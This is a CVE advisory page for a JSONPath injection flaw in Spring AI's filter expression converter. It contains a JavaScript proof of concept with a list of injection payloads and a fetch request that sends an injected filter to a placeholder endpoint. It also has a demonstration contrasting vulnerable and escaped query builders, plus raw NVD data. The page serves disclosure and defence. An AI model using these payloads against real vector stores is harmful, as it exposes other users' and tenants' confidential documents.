Security Vulnerability Report
CVE-2026-22729 CVSS 8.6 HIGH

CVE-2026-22729

Published: 2026-03-18 08:16:31
Last Modified: 2026-04-01 16:53:36

Description

A JSONPath injection vulnerability in Spring AI's AbstractFilterExpressionConverter allows authenticated users to bypass metadata-based access controls through crafted filter expressions. User-controlled input passed to FilterExpressionBuilder is concatenated into JSONPath queries without proper escaping, enabling attackers to inject arbitrary JSONPath logic and access unauthorized documents.

This vulnerability affects applications using vector stores that extend AbstractFilterExpressionConverter for multi-tenant isolation, role-based access control, or document filtering based on metadata.

The vulnerability occurs when user-supplied values in filter expressions are not escaped before being inserted into JSONPath queries. Special characters like ", ||, and && are passed through unescaped, allowing injection of arbitrary JSONPath logic that can alter the intended query semantics.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:* - VULNERABLE (versions from 1.0.0, before 1.0.4)
cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:* - VULNERABLE (versions from 1.1.0, before 1.1.3)
Spring AI 1.0.x before 1.0.4 and 1.1.x before 1.1.3 are affected according to the NVD configuration data; consult the vendor advisory for the fixed releases.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-22729 JSONPath Injection PoC
// Target: Spring AI AbstractFilterExpressionConverter
// Malicious filter expressions to bypass metadata-based access control.
// Every value below is a user-supplied string that the vulnerable converter
// concatenates into a JSONPath query without escaping.
const maliciousFilter = {
  // Inject JSONPath logic using special characters
  filter: '" || true || "',
  // Alternative injection using the && operator
  // filter: '" && true && "',
  // Access specific document metadata
  // filter: '"owner" == "attacker" || "sensitive" == true'
};

// Example exploitation through a vector store query.
// The endpoint and bearer token are placeholders for the target application.
async function exploitVectorStore() {
  const springAIEndpoint = 'https://target-api.ai/search';

  // Normal query (intended behavior): only the caller's own documents
  const normalQuery = {
    query: 'confidential document',
    filter: 'owner == "current_user"'
  };

  // Injected query (exploits CVE-2026-22729): the unescaped quote closes the
  // string literal and the `|| true` that follows makes the filter match every document
  const injectedQuery = {
    query: 'confidential document',
    filter: 'owner == "victim" || true || "'
  };

  const response = await fetch(springAIEndpoint, {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'Authorization': 'Bearer <legitimate_token>'
    },
    body: JSON.stringify(injectedQuery)
  });

  // Response may contain unauthorized documents
  const results = await response.json();
  return results;
}

// JSONPath injection payload examples
const payloads = [
  '" || true',
  '" || 1==1',
  '" && true && "',
  '"][*] || true',
  '"].* || true || "',
  '@.owner == "admin" || true'
];
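
The block below is an added example and is not code from Spring AI, from the advisory, or from the PoC above. It models in plain JavaScript the mechanism the Description explains and the PoC exercises: a builder that concatenates a user-supplied value into a JSONPath filter, a hardened builder that allow-lists the key and escapes backslash and double quote in the value, and a small tokenizer and evaluator for the filter subset involved (@.key == "string", true/false, ||, &&) so the change in query semantics can be observed on sample data. The sample documents, the owner key, the function names and the filter subset are assumptions made for the example; the escaping rule is illustrative and must match the string-literal syntax of whatever JSONPath engine the vector store actually uses, and the vendor's fix is the one shipped in the releases listed under Configurations, not this code.

```javascript
// Added example, not Spring AI's code: a builder that concatenates a user value
// into a JSONPath filter, a hardened variant, and a small evaluator. All constructed.
const DOCUMENTS = [
  { id: "d1", metadata: { owner: "alice", tenant: "acme" } },
  { id: "d2", metadata: { owner: "bob", tenant: "acme" } },
  { id: "d3", metadata: { owner: "carol", tenant: "globex" } },
];

// Vulnerable pattern: the value lands inside the string literal verbatim, so a
// quote in it closes the literal and whatever follows becomes JSONPath logic.
function buildFilterVulnerable(key, value) {
  return `$[?(@.${key} == "${value}")]`;
}

// Hardened pattern: allow-list the key and escape backslash and quote in the
// value, so the value can never terminate its own string literal.
function buildFilterHardened(key, value) {
  if (!/^[A-Za-z_][A-Za-z0-9_]*$/.test(key)) throw new Error(`invalid metadata key: ${key}`);
  const escaped = String(value).replace(/\\/g, "\\\\").replace(/"/g, '\\"');
  return `$[?(@.${key} == "${escaped}")]`;
}

// Tokenizer for the subset `$[?( ... )]` with @.key, "string" (honouring \" and \\),
// true/false, ==, || and &&. An unescaped quote ends the literal, as in a real engine.
function tokenize(filter) {
  const m = /^\$\[\?\(([\s\S]*)\)\]$/.exec(filter);
  if (!m) throw new Error("not a JSONPath filter expression");
  const expr = m[1], tokens = [];
  for (let i = 0; i < expr.length; ) {
    const c = expr[i];
    if (/\s/.test(c)) { i += 1; continue; }
    if (c === '"') {
      let value = "";
      for (i += 1; i < expr.length && expr[i] !== '"'; i += 1) {
        if (expr[i] === "\\" && i + 1 < expr.length) i += 1; // keep the escaped char
        value += expr[i];
      }
      if (i >= expr.length) throw new Error("unterminated string literal");
      tokens.push({ type: "str", value });
      i += 1; // closing quote
      continue;
    }
    const field = /^@\.([A-Za-z_][A-Za-z0-9_]*)/.exec(expr.slice(i));
    if (field) { tokens.push({ type: "field", name: field[1] }); i += field[0].length; continue; }
    const op = ["==", "||", "&&"].find((o) => expr.startsWith(o, i));
    if (op) { tokens.push({ type: "op", value: op }); i += 2; continue; }
    const kw = /^(true|false)\b/.exec(expr.slice(i));
    if (kw) { tokens.push({ type: "bool", value: kw[1] === "true" }); i += kw[1].length; continue; }
    throw new Error(`unexpected character at ${i}: ${c}`);
  }
  return tokens;
}

// Recursive-descent parser producing a predicate over a metadata object. ||
// binds loosest, && tighter; a bare literal is truthy for `true` or a non-empty string.
function parseFilter(filter) {
  const tokens = tokenize(filter);
  let pos = 0;
  const isOp = (v) => pos < tokens.length && tokens[pos].type === "op" && tokens[pos].value === v;
  function primary() {
    const t = tokens[pos++];
    if (!t) throw new Error("unexpected end of expression");
    if (t.type === "bool") return () => t.value;
    if (t.type === "str") return () => t.value.length > 0;
    if (t.type !== "field" || !isOp("==")) throw new Error(`unexpected token at ${pos - 1}`);
    const rhs = tokens[pos + 1]; pos += 2; // consume == and the right-hand side
    if (!rhs || rhs.type !== "str") throw new Error("expected a string literal after ==");
    return (meta) => meta[t.name] === rhs.value;
  }
  function andExpr() {
    let left = primary();
    while (isOp("&&")) { pos += 1; const l = left, r = primary(); left = (m) => l(m) && r(m); }
    return left;
  }
  function orExpr() {
    let left = andExpr();
    while (isOp("||")) { pos += 1; const l = left, r = andExpr(); left = (m) => l(m) || r(m); }
    return left;
  }
  const pred = orExpr();
  if (pos !== tokens.length) throw new Error("trailing tokens in filter");
  return pred;
}
// Ids of the documents the filter admits.
function evaluateFilter(filter, docs) {
  const pred = parseFilter(filter);
  return docs.filter((d) => pred(d.metadata)).map((d) => d.id);
}

// Invariant for a generated query: a single-comparison builder must emit no || or &&.
function countLogicalOperators(filter) {
  return tokenize(filter).filter((t) => t.type === "op" && t.value !== "==").length;
}

// The PoC's payload as the bare value of an `owner` filter (constructed input).
const INJECTED_VALUE = 'victim" || true || "';
console.log(evaluateFilter(buildFilterVulnerable("owner", INJECTED_VALUE), DOCUMENTS)); // [ 'd1', 'd2', 'd3' ]
console.log(evaluateFilter(buildFilterHardened("owner", INJECTED_VALUE), DOCUMENTS)); // []
```

Running the block prints the vulnerable filter admitting all three constructed documents and the hardened filter admitting none, because the escaped value can no longer close its own string literal. countLogicalOperators gives a cheap runtime invariant: a builder asked for a single comparison should never emit a query containing || or &&, so a positive count on the generated query is a direct detection signal for this class of injection, independent of which payload from the list above was used.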

References

https://spring.io/security/cve-2026-22729 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22729",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-18T08:16:31.000",
    "lastModified": "2026-04-01T16:53:35.810",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A JSONPath injection vulnerability in Spring AI's AbstractFilterExpressionConverter allows authenticated users to bypass metadata-based access controls through crafted filter expressions. User-controlled input passed to FilterExpressionBuilder is concatenated into JSONPath queries without proper escaping, enabling attackers to inject arbitrary JSONPath logic and access unauthorized documents.\n\nThis vulnerability affects applications using vector stores that extend AbstractFilterExpressionConverter for multi-tenant isolation, role-based access control, or document filtering based on metadata.\n\nThe vulnerability occurs when user-supplied values in filter expressions are not escaped before being inserted into JSONPath queries. Special characters like \", ||, and && are passed through unescaped, allowing injection of arbitrary JSONPath logic that can alter the intended query semantics."
      },
      {
        "lang": "es",
        "value": "Una vulnerabilidad de inyección de JSONPath en el AbstractFilterExpressionConverter de Spring AI permite a usuarios autenticados eludir los controles de acceso basados en metadatos mediante expresiones de filtro manipuladas. La entrada controlada por el usuario pasada a FilterExpressionBuilder se concatena en consultas JSONPath sin el escape adecuado, lo que permite a los atacantes inyectar lógica JSONPath arbitraria y acceder a documentos no autorizados.\n\nEsta vulnerabilidad afecta a las aplicaciones que utilizan almacenes vectoriales que extienden AbstractFilterExpressionConverter para aislamiento multi-inquilino, control de acceso basado en roles o filtrado de documentos basado en metadatos.\n\nLa vulnerabilidad ocurre cuando los valores proporcionados por el usuario en las expresiones de filtro no se escapan antes de ser insertados en las consultas JSONPath. Caracteres especiales como '\"', '||' y '&&' se pasan sin escapar, lo que permite la inyección de lógica JSONPath arbitraria que puede alterar la semántica de la consulta prevista."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-917"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "1.0.0",
                "versionEndExcluding": "1.0.4",
                "matchCriteriaId": "F510851F-2162-4380-97A0-75456BC7875A"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "1.1.0",
                "versionEndExcluding": "1.1.3",
                "matchCriteriaId": "34C3CF7E-1A85-4EFE-8CC0-03E85527B2D5"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://spring.io/security/cve-2026-22729",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}